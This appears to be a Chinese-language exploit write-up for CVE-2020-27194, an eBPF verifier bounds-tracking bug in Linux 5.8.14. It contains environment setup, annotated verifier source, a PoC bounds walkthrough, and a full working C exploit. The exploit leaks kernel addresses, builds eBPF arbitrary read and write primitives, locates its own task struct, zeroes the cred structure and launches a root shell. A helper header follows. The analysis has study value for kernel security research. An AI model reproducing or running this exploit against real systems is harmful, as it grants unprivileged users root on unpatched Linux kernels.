CVE-2020-27194


环境搭建

version

Linux-5.8.14

config

CONFIG_DEBUG_INFO #调试符号
CONFIG_USER_NS=y #支持新的namespace
CONFIG_BPF_UNPRIV_DEFAULT_OFF=n # 默认允许非特权用户加载 eBPF

CONFIG_CGROUP_BPF=y
CONFIG_BPF=y
CONFIG_BPF_LSM=y
CONFIG_BPF_SYSCALL=y
CONFIG_ARCH_WANT_DEFAULT_BPF_JIT=y
CONFIG_BPF_JIT_ALWAYS_ON=y
CONFIG_BPF_JIT_DEFAULT_ON=y
CONFIG_BPF_PRELOAD=y
CONFIG_BPFILTER=y
CONFIG_BPFILTER_UMH=m
CONFIG_NET_CLS_BPF=y
CONFIG_NET_ACT_BPF=y
CONFIG_BPF_JIT=y
CONFIG_HAVE_EBPF_JIT=y
CONFIG_BPF_EVENTS=y
CONFIG_BPF_KPROBE_OVERRIDE=y
CONFIG_TEST_BPF=m
CONFIG_BPF_SYSCALL=y
CONFIG_BPFILTER=y
CONFIG_NET_CLS_BPF=y
CONFIG_NET_ACT_BPF=y
CONFIG_BPF_JIT=y
CONFIG_TEST_BPF=y

CONFIG_DEBUG_INFO #调试符号
CONFIG_USER_NS=y #支持新的namespace
make  CFLAGS_KERNEL="-g" CFLAGS_MODULE="-g" -j4

objtool

vim tools/objtool/elf.c

xt_TCPMSS.c

https://lore.kernel.org/bpf/CAM_iQpVyWmmOiz+x4fvQbeqQJ_u-bbCsY3o=aO4Yp0PmK8bYTg@mail.gmail.com/T/

vim net/netfilter/Makefile

分析

static void scalar32_min_max_or(struct bpf_reg_state *dst_reg,
struct bpf_reg_state *src_reg)
{
bool src_known = tnum_subreg_is_const(src_reg->var_off); // 检查低 src_reg 32 位是否已知
bool dst_known = tnum_subreg_is_const(dst_reg->var_off); // 检查低 dst_reg 32 位是否已知
struct tnum var32_off = tnum_subreg(dst_reg->var_off); // 取 dst_reg 的低 32 位
s32 smin_val = src_reg->smin_value; // 直接截断
u32 umin_val = src_reg->umin_value;

/* Assuming scalar64_min_max_or will be called so it is safe
* to skip updating register for known case.
*/
if (src_known && dst_known)
return;

/* We get our maximum from the var_off, and our minimum is the
* maximum of the operands' minima
*/

dst_reg->u32_min_value = max(dst_reg->u32_min_value, umin_val); //对于一个无符号数来说,or只会变大,所以最小值从两者之中较大者选
dst_reg->u32_max_value = var32_off.value | var32_off.mask; //假设所有未知位全都是1
if (dst_reg->s32_min_value < 0 || smin_val < 0) { //两者之中有一个可能是负数,那么最终的最高位也有可能是1,也就是说最终结果可能是负数
/* Lose signed bounds when ORing negative numbers,
* ain't nobody got time for that. //对负数进行“或”运算时会失去符号界限,
* 没有人有时间这么做。没有意义?设置为最大边界
*/
dst_reg->s32_min_value = S32_MIN;
dst_reg->s32_max_value = S32_MAX;
} else {
/* ORing two positives gives a positive, so safe to
* cast result into s64.
*/
///到了这里,说明s32min是非负数,那么s32max也应该是非负数,所以想直接用umin和max,但是注意用的不是u32min和u32max
// 直接截断
dst_reg->s32_min_value = dst_reg->umin_value;
dst_reg->s32_max_value = dst_reg->umax_value;
//这里的问题难道不是64位边界值根本就没有更新?
}
}

在这个函数执行完之后会将 dst_reg 原来的umin_value/umax_value直接 赋值给 dst_reg的s32_min_value和s32_max_value;然后调整64位边界:

这时dst_reg->umin_value 被复制为src->reg的umin_value, 但是其umax_value则是xxx

static void __update_reg32_bounds(struct bpf_reg_state *reg)
{
struct tnum var32_off = tnum_subreg(reg->var_off);

/* min signed is max(sign bit) | min(other bits) */
reg->s32_min_value = max_t(s32, reg->s32_min_value,
var32_off.value | (var32_off.mask & S32_MIN));
/* max signed is min(sign bit) | max(other bits) */
reg->s32_max_value = min_t(s32, reg->s32_max_value,
var32_off.value | (var32_off.mask & S32_MAX));
reg->u32_min_value = max_t(u32, reg->u32_min_value, (u32)var32_off.value);
reg->u32_max_value = min(reg->u32_max_value,
(u32)(var32_off.value | var32_off.mask));
}

static void __update_reg64_bounds(struct bpf_reg_state *reg)
{
/* min signed is max(sign bit) | min(other bits) */
reg->smin_value = max_t(s64, reg->smin_value,
reg->var_off.value | (reg->var_off.mask & S64_MIN)); //S64_MIN 0x8000000000000000 取mask最高位 和 value进行或,让
/* max signed is min(sign bit) | max(other bits) */
reg->smax_value = min_t(s64, reg->smax_value,
reg->var_off.value | (reg->var_off.mask & S64_MAX));
reg->umin_value = max(reg->umin_value, reg->var_off.value);
reg->umax_value = min(reg->umax_value,
reg->var_off.value | reg->var_off.mask);
}

static void __update_reg_bounds(struct bpf_reg_state *reg)
{
__update_reg32_bounds(reg);
__update_reg64_bounds(reg);
}

总结一下:

smin是先用var_off算一个var_off.value可能为负则强制负数后的值,和自己两者取大;

smax是先将var_off中除了符号位之外的所有未知位全置1,和自己两者取小;

umin将自己和var_off.value 两者取大;

umax将自己和var_off.value所有未知位置1后的值 两者取小;

/* Uses signed min/max values to inform unsigned, and vice-versa */
static void __reg32_deduce_bounds(struct bpf_reg_state *reg)
{
/* Learn sign from signed bounds.
* If we cannot cross the sign boundary, then signed and unsigned bounds
* are the same, so combine. This works even in the negative case, e.g.
* -3 s<= x s<= -1 implies 0xf...fd u<= x u<= 0xf...ff.
*/
if (reg->s32_min_value >= 0 || reg->s32_max_value < 0) { //如果不跨符号的情况
//不跨符号的比较是一致的
reg->s32_min_value = reg->u32_min_value =
max_t(u32, reg->s32_min_value, reg->u32_min_value);
reg->s32_max_value = reg->u32_max_value =
min_t(u32, reg->s32_max_value, reg->u32_max_value);
return;
}
/* Learn sign from unsigned bounds. Signed bounds cross the sign
* boundary, so we must be careful.
*/
if ((s32)reg->u32_max_value >= 0) {
//无符号范围最高位恒0,说明有符号的边界值的跨符号是没有意义的
/* Positive. We can't learn anything from the smin, but smax
* is positive, hence safe.
*/
reg->s32_min_value = reg->u32_min_value;
reg->s32_max_value = reg->u32_max_value =
min_t(u32, reg->s32_max_value, reg->u32_max_value);
} else if ((s32)reg->u32_min_value < 0) {
//无符号范围最高位恒1,说明有符号的边界值的跨符号是没有意义的
/* Negative. We can't learn anything from the smax, but smin
* is negative, hence safe.
*/
reg->s32_min_value = reg->u32_min_value =
max_t(u32, reg->s32_min_value, reg->u32_min_value);
reg->s32_max_value = reg->u32_max_value;
}
}

static void __reg64_deduce_bounds(struct bpf_reg_state *reg)
{
/* Learn sign from signed bounds.
* If we cannot cross the sign boundary, then signed and unsigned bounds
* are the same, so combine. This works even in the negative case, e.g.
* -3 s<= x s<= -1 implies 0xf...fd u<= x u<= 0xf...ff.
*/
if (reg->smin_value >= 0 || reg->smax_value < 0) {
reg->smin_value = reg->umin_value = max_t(u64, reg->smin_value,
reg->umin_value);
reg->smax_value = reg->umax_value = min_t(u64, reg->smax_value,
reg->umax_value);
return;
}
/* Learn sign from unsigned bounds. Signed bounds cross the sign
* boundary, so we must be careful.
*/
if ((s64)reg->umax_value >= 0) {
/* Positive. We can't learn anything from the smin, but smax
* is positive, hence safe.
*/
reg->smin_value = reg->umin_value;
reg->smax_value = reg->umax_value = min_t(u64, reg->smax_value,
reg->umax_value);
} else if ((s64)reg->umin_value < 0) {
/* Negative. We can't learn anything from the smax, but smin
* is negative, hence safe.
*/
reg->smin_value = reg->umin_value = max_t(u64, reg->smin_value,
reg->umin_value);
reg->smax_value = reg->umax_value;
}
}

static void __reg_deduce_bounds(struct bpf_reg_state *reg)
{
__reg32_deduce_bounds(reg);
__reg64_deduce_bounds(reg);
}

总结deduce:

如果有符号范围不跨符号,则比较大小是统一的,直接和无符号范围相统一(比较后min取大,max取小);

否则,如果发现无符号边界值的最高位是统一的,说明有符号边界值的符号是没意义的,要缩小范围,直接缩掉没用的符号(直接赋值),另一边比较后统一;

/* Attempts to improve var_off based on unsigned min/max information */
static void __reg_bound_offset(struct bpf_reg_state *reg)
{
struct tnum var64_off = tnum_intersect(reg->var_off,
tnum_range(reg->umin_value,
reg->umax_value));
struct tnum var32_off = tnum_intersect(tnum_subreg(reg->var_off),
tnum_range(reg->u32_min_value,
reg->u32_max_value));

reg->var_off = tnum_or(tnum_clear_subreg(var64_off), var32_off);
}

scaler32然后scalar64,scalar64最后会__update_reg_bounds一次,然后在switch-case中brrak退出来,依次执行:

​ __update_reg_bounds 重复执行两次,用var_off更新边界值;

​ __reg_deduce_bounds u和s之间的调整;

__reg_bound_offset 用边界值信息更新var_off

poc

15行r1范围[0, 8],然后|0x100之后var_off = {0x100, 0xf},范围搞错了,用了没更新过的64位范围,所以有符号范围被更新为了[0, 8],至此为

s32[0, 8]

u32[0x100 ,0x10f]

s64[-inf, inf]

u64[0, 8]

然后用var_off更新边界值:// var_off = {0x100, 0xf}

s32[0x100, 0x8]

u32[0x100 ,0x10f]

s64[0x100, 0x8]

u64[0x100, 0x10f]

然后是deduce:(全是符号统一的,所以直接比较后统一)

s32[0x100, 0x8]

u32[0x100 ,0x8]

s64[0x100, 0x8]

u64[0x100, 0x8]

因此得到了范围不合适的寄存器!

总结

__update_reg_bounds 重复执行两次,用var_off更新边界值;

smin是先用var_off算一个var_off.value可能为负则强制负数后的值,和自己两者取大;

smax是先将var_off中除了符号位之外的所有未知位全置1,和自己两者取小;

umin将自己和var_off.value 两者取大;

umax将自己和var_off.value所有未知位置1后的值 两者取小;

__reg_deduce_bounds u和s之间的调整;

如果有符号范围不跨符号,则比较大小是统一的,直接和无符号范围相统一(比较后min取大,max取小);

否则,如果发现无符号边界值的最高位是统一的,说明有符号边界值的符号是没意义的,要缩小范围,直接缩掉没用的符号(直接赋值),另一边比较后统一;

__reg_bound_offset 用边界值信息更新var_off

攻击成功

FINAL-EXP

exp:

#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <sched.h>
#include <sys/types.h>
#include <linux/keyctl.h>

size_t user_cs, user_ss, user_rflags, user_sp;
void save_status()
{
asm volatile (
"mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
);
puts("\033[34m\033[1m[*] Status has been saved.\033[0m");
}

void get_root_shell(){
printf("now pid == %p\n", getpid());
system("/bin/sh");
}

//CPU绑核
void bindCore(int core)
{
cpu_set_t cpu_set;

CPU_ZERO(&cpu_set);
CPU_SET(core, &cpu_set);
sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}

size_t page_offset_base;
int map_fd, expmap_fd;

#include <linux/bpf.h>
#include <stdint.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include "bpf_insn.h"

static inline int bpf(int cmd, union bpf_attr *attr)
{
return syscall(__NR_bpf, cmd, attr, sizeof(*attr));
}

#define CODE \
BPF_MOV64_REG(BPF_REG_9, BPF_REG_1),\
BPF_LD_MAP_FD(BPF_REG_1, 3), \
BPF_MOV64_REG(BPF_REG_2, BPF_REG_10), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8), \
BPF_ST_MEM(BPF_DW, BPF_REG_2, 0, 0), \
BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), \
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), \
BPF_EXIT_INSN(),\
BPF_MOV64_REG(BPF_REG_7, BPF_REG_0),\
BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_7, 0),\
BPF_LDX_MEM(BPF_DW, BPF_REG_2, BPF_REG_7, 8),\
BPF_JMP_IMM(BPF_JLE, BPF_REG_1, 8, 2), \
BPF_MOV64_IMM(BPF_REG_0, 0), \
BPF_EXIT_INSN(), \
BPF_ALU32_IMM(BPF_OR, BPF_REG_1, 0x100),\

#define VULREG \
BPF_MOV64_REG(BPF_REG_9, BPF_REG_1),\
BPF_LD_MAP_FD(BPF_REG_1, 3), \
BPF_MOV64_REG(BPF_REG_2, BPF_REG_10), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8), \
BPF_ST_MEM(BPF_DW, BPF_REG_2, 0, 0), \
BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), \
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), \
BPF_EXIT_INSN(),\
BPF_MOV64_REG(BPF_REG_7, BPF_REG_0),\
BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_7, 0),\
BPF_LDX_MEM(BPF_DW, BPF_REG_2, BPF_REG_7, 8),\
BPF_JMP_IMM(BPF_JLE, BPF_REG_1, 1, 2), \
BPF_MOV64_IMM(BPF_REG_0, 0), \
BPF_EXIT_INSN(), \
BPF_ALU32_IMM(BPF_OR, BPF_REG_1, 2),\
BPF_ALU64_IMM(BPF_SUB, BPF_REG_1, 1),\
BPF_JMP_IMM(BPF_JLE, BPF_REG_2, 1, 2), \
BPF_MOV64_IMM(BPF_REG_0, 0), \
BPF_EXIT_INSN(),\
BPF_ALU64_REG(BPF_ADD, BPF_REG_1, BPF_REG_2),\
BPF_ALU64_IMM(BPF_AND, BPF_REG_1, 2),\
BPF_MOV64_REG(BPF_REG_6, BPF_REG_1),\




//最终得到reg6实际为2,确信为0,前提是map_fd传递value[0] = 1, value[1] = 0,此时reg7指向map_fd的array

struct bpf_insn prog1[] = {
VULREG
BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),
BPF_ALU64_IMM(BPF_MUL, BPF_REG_6, 0x110/2),
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_6),
BPF_LDX_MEM(BPF_DW, BPF_REG_2, BPF_REG_7, 0),
BPF_STX_MEM(BPF_DW, BPF_REG_1, BPF_REG_2, 0),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 0xc0),
BPF_LDX_MEM(BPF_DW, BPF_REG_2, BPF_REG_7, 0),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_1, 8),
BPF_STX_MEM(BPF_DW, BPF_REG_1, BPF_REG_2, 0),

BPF_MOV64_IMM(BPF_REG_0, 0),
BPF_EXIT_INSN(),
};


#define BPF_LOG_SZ 0x20000
char bpf_log_buf[BPF_LOG_SZ] = { '\0' };
int load_prog(struct bpf_insn prog[], int cnt){

int prog_fd;
union bpf_attr attr = {
.prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
.insns = (uint64_t) prog,
.insn_cnt = cnt,
.license = (uint64_t) "GPL",
.log_level = 2,
.log_buf = (uint64_t) bpf_log_buf,
.log_size = BPF_LOG_SZ,
};
prog_fd = bpf(BPF_PROG_LOAD, &attr);
if (prog_fd < 0) {
puts(bpf_log_buf);
perror("BPF_PROG_LOAD");
return -1;
}
//puts(bpf_log_buf);
//printf("prog_fd == %d\n", prog_fd);

return prog_fd;


}

void trigger_prog(int prog_fd){
int sockets[2];
if (socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets) < 0)
perror("socketpair()");

if (setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &prog_fd, sizeof(prog_fd)) < 0)
perror("socketpair SO_ATTACH_BPF");
char s[0x1000];
int wl = write(sockets[0], s, 0x100);
//printf("wl == %d\n", wl);
}





static __always_inline int
bpf_map_create(unsigned int map_type, unsigned int key_size,
unsigned int value_size, unsigned int max_entries)
{
union bpf_attr attr = {
.map_type = map_type,
.key_size = key_size,
.value_size = value_size,
.max_entries = max_entries,
};
return bpf(BPF_MAP_CREATE, &attr);
}

static __always_inline int
bpf_map_get_elem(int map_fd, const void *key, void *value)
{
union bpf_attr attr = {
.map_fd = map_fd,
.key = (uint64_t)key,
.value = (uint64_t)value,
};

// 使用 BPF_MAP_LOOKUP_ELEM 获取 map 中的元素
return bpf(BPF_MAP_LOOKUP_ELEM, &attr);
}

static __always_inline uint32_t
bpf_map_get_info_by_fd(int map_fd)
{
struct bpf_map_info info;
union bpf_attr attr = {
.info.bpf_fd = map_fd,
.info.info_len = sizeof(info),
.info.info = (uint64_t)&info,

};
bpf(BPF_OBJ_GET_INFO_BY_FD, &attr);
return info.btf_id;
}

static __always_inline int
bpf_map_update_elem(int map_fd, const void* key, const void* value, uint64_t flags)
{
union bpf_attr attr = {
.map_fd = map_fd,
.key = (uint64_t)key,
.value = (uint64_t)value,
.flags = flags,
};
return bpf(BPF_MAP_UPDATE_ELEM, &attr);
}

size_t ker_offset;


int create_bpf_array_of_map(int fd, int key_size, int value_size, int max_entries) {
union bpf_attr attr = {
.map_type = BPF_MAP_TYPE_ARRAY_OF_MAPS,
.key_size = key_size,
.value_size = value_size,
.max_entries = max_entries,
// .map_flags = BPF_F_MMAPABLE,
.inner_map_fd = fd,
};

int map_fd = syscall(SYS_bpf, BPF_MAP_CREATE, &attr, sizeof(attr));
if (map_fd < 0) {
return -1;
}
return map_fd;
}

struct bpf_insn prog2[] = {
VULREG
BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8),
BPF_STX_MEM(BPF_DW, BPF_REG_2, BPF_REG_7, 0),

BPF_MOV64_REG(BPF_REG_1, BPF_REG_9),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8),
BPF_MOV64_REG(BPF_REG_3, BPF_REG_2),
BPF_MOV64_IMM(BPF_REG_2, 0),
BPF_MOV64_IMM(BPF_REG_4, 8),
BPF_ALU64_IMM(BPF_MUL, BPF_REG_6, 4),
BPF_ALU64_REG(BPF_ADD, BPF_REG_4, BPF_REG_6),
BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0, 0, 0, BPF_FUNC_skb_load_bytes),

BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8),

BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_2, 0),
BPF_LDX_MEM(BPF_DW, BPF_REG_4, BPF_REG_1, 0),
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_4, 0),


BPF_MOV64_IMM(BPF_REG_0, 0),
BPF_EXIT_INSN(),
};

size_t aar(size_t addr, int aar_prog_fd){
int sockets[2];
if (socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets) < 0)
perror("socketpair()");

if (setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &aar_prog_fd, sizeof(aar_prog_fd)) < 0)
perror("socketpair SO_ATTACH_BPF");

size_t key;
size_t value[0x1000];
value[0] = 1LL;
value[1] = 0LL;
bpf_map_update_elem(map_fd, &key, value, BPF_ANY);


size_t data[0x1000];
data[0] = addr;
data[1] = addr;
int wl = write(sockets[0], data, 0x100);
//printf("wl == %d\n", wl);

value[0] = 0x12341234LL;
bpf_map_get_elem(map_fd, &key, value);
//printf("aar == %p\n", (void *)value[0]);

return value[0];
}

struct bpf_insn prog3[] = {
VULREG
BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8),
BPF_STX_MEM(BPF_DW, BPF_REG_2, BPF_REG_7, 0),

BPF_MOV64_REG(BPF_REG_1, BPF_REG_9),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8),
BPF_MOV64_REG(BPF_REG_3, BPF_REG_2),
BPF_MOV64_IMM(BPF_REG_2, 0),
BPF_MOV64_IMM(BPF_REG_4, 8),
BPF_ALU64_IMM(BPF_MUL, BPF_REG_6, 4),
BPF_ALU64_REG(BPF_ADD, BPF_REG_4, BPF_REG_6),
BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0, 0, 0, BPF_FUNC_skb_load_bytes),

BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8),
BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_2, 0), //goal_addr
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8),
BPF_LDX_MEM(BPF_DW, BPF_REG_3, BPF_REG_2, 0), //value
BPF_STX_MEM(BPF_DW, BPF_REG_1, BPF_REG_3, 0),


BPF_MOV64_IMM(BPF_REG_0, 0),
BPF_EXIT_INSN(),
};
size_t aaw(size_t addr, int aar_prog_fd, size_t val){
int sockets[2];
if (socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets) < 0)
perror("socketpair()");

if (setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &aar_prog_fd, sizeof(aar_prog_fd)) < 0)
perror("socketpair SO_ATTACH_BPF");

size_t key;
size_t value[0x1000];
value[0] = 1LL;
value[1] = 0LL;
bpf_map_update_elem(map_fd, &key, value, BPF_ANY);


size_t data[0x1000];
data[0] = val;
data[1] = addr;
int wl = write(sockets[0], data, 0x100);
//printf("wl == %d\n", wl);


}

size_t init_task;
size_t comm_off, cred_off, task_off;
#include <sys/prctl.h>
void aar_aaw(int aar_prog_fd, int aaw_prog_fd){
if(prctl(PR_SET_NAME, "QianYiming", NULL, NULL, NULL) < 0){
perror("prctl set name");
}
size_t task = init_task+task_off;
size_t my_task = -1;
aar_prog_fd = load_prog(&prog2, sizeof(prog2)/sizeof(prog2[0]));
//printf("task == %p\n", (void *)task);
while(task){

task = aar(task, aar_prog_fd);
size_t name = aar(task-task_off+comm_off, aar_prog_fd);
//printf("task == %p\n", (void *)task);
//puts(&name);
if(!memcmp(&name, "QianYiming", 8)){
my_task = task-task_off;
break;
}


}
printf("my_task == %p\n", (void *)my_task);
size_t my_cred = aar(my_task+cred_off, aar_prog_fd);
printf("my_cred == %p\n", (void *)my_cred);

aaw_prog_fd = load_prog(&prog3, sizeof(prog3)/sizeof(prog3[0]));

for(int i = 0; i <= 0x28; i += 8){
aaw(my_cred+i, aaw_prog_fd, 0LL);
}

//system("/bin/sh");
}


int main(){

save_status();
bindCore(0);

map_fd = bpf_map_create(BPF_MAP_TYPE_ARRAY, sizeof(int), 0x2000, 1);
if (map_fd < 0) perror("BPF_MAP_CREATE");//, err_exit("BPF_MAP_CREATE");
//printf("map_fd == %d\n", map_fd);

expmap_fd = bpf_map_create(BPF_MAP_TYPE_ARRAY, sizeof(int), 0x2000, 1);
if (expmap_fd < 0) perror("BPF_MAP_CREATE");//, err_exit("BPF_MAP_CREATE");

size_t key = 0;
size_t value[0x1000];
value[0] = 1LL;
value[1] = 0LL;
bpf_map_update_elem(map_fd, &key, value, BPF_ANY);

trigger_prog(load_prog(&prog1, sizeof(prog1)/sizeof(prog1[0])));


value[0] = 0x1234;
bpf_map_get_elem(map_fd, &key, value);
printf("leak : %p\n", (void *)value[0]);
printf("map_wait_list : %p\n", (void *)value[1]);

ker_offset = value[0] - 0xffffffff82017a80;
printf("ker_offset == %p\n", (void *)ker_offset);
size_t page_base_offset = value[1] & 0xfffffffff0000000;
printf("page_base_offset == %p\n", (void *)page_base_offset);

init_task = ker_offset + 0xffffffff82412840;
comm_off = 0x648;
cred_off = 0x630;
task_off = 0x390;

if(prctl(PR_SET_NAME, "QianYiming", NULL, NULL, NULL) < 0){
perror("prctl set name");
}

int r = load_prog(&prog2, sizeof(prog2)/sizeof(prog2[0]));
size_t my_task = -1;
size_t task = init_task + task_off;
for(int i = 0; i < 100; i++){
task = aar(task, r);
//printf("task == %p\n", (void *)task);
size_t name = aar(task-task_off+comm_off, r);
//printf("name : %s\n", (void *)&name);
if(!memcmp(&name, "QianYiming", 8)){
my_task = task - task_off;
break;
}
}
size_t my_cred = aar(my_task + cred_off, r);
printf("my_cred == %p\n", (void *)my_cred);

int w = load_prog(&prog3, sizeof(prog3)/sizeof(prog3[0]));
for(int i = 0; i <= 0x28; i += 8){
aaw(my_cred + i, w, 0LL);
}
system("/bin/sh");
return 0;




}



bpf_insn.h:

/* SPDX-License-Identifier: (GPL-2.0-only OR BSD-2-Clause) */
/* eBPF instruction mini library */
#ifndef __BPF_INSN_H
#define __BPF_INSN_H

struct bpf_insn;

/* ALU ops on registers, bpf_add|sub|...: dst_reg += src_reg */

#define BPF_ALU64_REG(OP, DST, SRC) \
((struct bpf_insn) { \
.code = BPF_ALU64 | BPF_OP(OP) | BPF_X, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = 0, \
.imm = 0 })

#define BPF_ALU32_REG(OP, DST, SRC) \
((struct bpf_insn) { \
.code = BPF_ALU | BPF_OP(OP) | BPF_X, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = 0, \
.imm = 0 })

/* ALU ops on immediates, bpf_add|sub|...: dst_reg += imm32 */

#define BPF_ALU64_IMM(OP, DST, IMM) \
((struct bpf_insn) { \
.code = BPF_ALU64 | BPF_OP(OP) | BPF_K, \
.dst_reg = DST, \
.src_reg = 0, \
.off = 0, \
.imm = IMM })

#define BPF_ALU32_IMM(OP, DST, IMM) \
((struct bpf_insn) { \
.code = BPF_ALU | BPF_OP(OP) | BPF_K, \
.dst_reg = DST, \
.src_reg = 0, \
.off = 0, \
.imm = IMM })

/* Short form of mov, dst_reg = src_reg */

#define BPF_MOV64_REG(DST, SRC) \
((struct bpf_insn) { \
.code = BPF_ALU64 | BPF_MOV | BPF_X, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = 0, \
.imm = 0 })

#define BPF_MOV32_REG(DST, SRC) \
((struct bpf_insn) { \
.code = BPF_ALU | BPF_MOV | BPF_X, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = 0, \
.imm = 0 })

/* Short form of mov, dst_reg = imm32 */

#define BPF_MOV64_IMM(DST, IMM) \
((struct bpf_insn) { \
.code = BPF_ALU64 | BPF_MOV | BPF_K, \
.dst_reg = DST, \
.src_reg = 0, \
.off = 0, \
.imm = IMM })

#define BPF_MOV32_IMM(DST, IMM) \
((struct bpf_insn) { \
.code = BPF_ALU | BPF_MOV | BPF_K, \
.dst_reg = DST, \
.src_reg = 0, \
.off = 0, \
.imm = IMM })

/* BPF_LD_IMM64 macro encodes single 'load 64-bit immediate' insn */
#define BPF_LD_IMM64(DST, IMM) \
BPF_LD_IMM64_RAW(DST, 0, IMM)

#define BPF_LD_IMM64_RAW(DST, SRC, IMM) \
((struct bpf_insn) { \
.code = BPF_LD | BPF_DW | BPF_IMM, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = 0, \
.imm = (__u32) (IMM) }), \
((struct bpf_insn) { \
.code = 0, /* zero is reserved opcode */ \
.dst_reg = 0, \
.src_reg = 0, \
.off = 0, \
.imm = ((__u64) (IMM)) >> 32 })

#ifndef BPF_PSEUDO_MAP_FD
# define BPF_PSEUDO_MAP_FD 1
#endif

/* pseudo BPF_LD_IMM64 insn used to refer to process-local map_fd */
#define BPF_LD_MAP_FD(DST, MAP_FD) \
BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD)


/* Direct packet access, R0 = *(uint *) (skb->data + imm32) */

#define BPF_LD_ABS(SIZE, IMM) \
((struct bpf_insn) { \
.code = BPF_LD | BPF_SIZE(SIZE) | BPF_ABS, \
.dst_reg = 0, \
.src_reg = 0, \
.off = 0, \
.imm = IMM })

/* Memory load, dst_reg = *(uint *) (src_reg + off16) */

#define BPF_LDX_MEM(SIZE, DST, SRC, OFF) \
((struct bpf_insn) { \
.code = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = OFF, \
.imm = 0 })

/* Memory store, *(uint *) (dst_reg + off16) = src_reg */

#define BPF_STX_MEM(SIZE, DST, SRC, OFF) \
((struct bpf_insn) { \
.code = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = OFF, \
.imm = 0 })

/*
* Atomic operations:
*
* BPF_ADD *(uint *) (dst_reg + off16) += src_reg
* BPF_AND *(uint *) (dst_reg + off16) &= src_reg
* BPF_OR *(uint *) (dst_reg + off16) |= src_reg
* BPF_XOR *(uint *) (dst_reg + off16) ^= src_reg
* BPF_ADD | BPF_FETCH src_reg = atomic_fetch_add(dst_reg + off16, src_reg);
* BPF_AND | BPF_FETCH src_reg = atomic_fetch_and(dst_reg + off16, src_reg);
* BPF_OR | BPF_FETCH src_reg = atomic_fetch_or(dst_reg + off16, src_reg);
* BPF_XOR | BPF_FETCH src_reg = atomic_fetch_xor(dst_reg + off16, src_reg);
* BPF_XCHG src_reg = atomic_xchg(dst_reg + off16, src_reg)
* BPF_CMPXCHG r0 = atomic_cmpxchg(dst_reg + off16, r0, src_reg)
*/

#define BPF_ATOMIC_OP(SIZE, OP, DST, SRC, OFF) \
((struct bpf_insn) { \
.code = BPF_STX | BPF_SIZE(SIZE) | BPF_ATOMIC, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = OFF, \
.imm = OP })

/* Legacy alias */
#define BPF_STX_XADD(SIZE, DST, SRC, OFF) BPF_ATOMIC_OP(SIZE, BPF_ADD, DST, SRC, OFF)

/* Memory store, *(uint *) (dst_reg + off16) = imm32 */

#define BPF_ST_MEM(SIZE, DST, OFF, IMM) \
((struct bpf_insn) { \
.code = BPF_ST | BPF_SIZE(SIZE) | BPF_MEM, \
.dst_reg = DST, \
.src_reg = 0, \
.off = OFF, \
.imm = IMM })

/* Conditional jumps against registers, if (dst_reg 'op' src_reg) goto pc + off16 */

#define BPF_JMP_REG(OP, DST, SRC, OFF) \
((struct bpf_insn) { \
.code = BPF_JMP | BPF_OP(OP) | BPF_X, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = OFF, \
.imm = 0 })

/* Like BPF_JMP_REG, but with 32-bit wide operands for comparison. */

#define BPF_JMP32_REG(OP, DST, SRC, OFF) \
((struct bpf_insn) { \
.code = BPF_JMP32 | BPF_OP(OP) | BPF_X, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = OFF, \
.imm = 0 })

/* Conditional jumps against immediates, if (dst_reg 'op' imm32) goto pc + off16 */

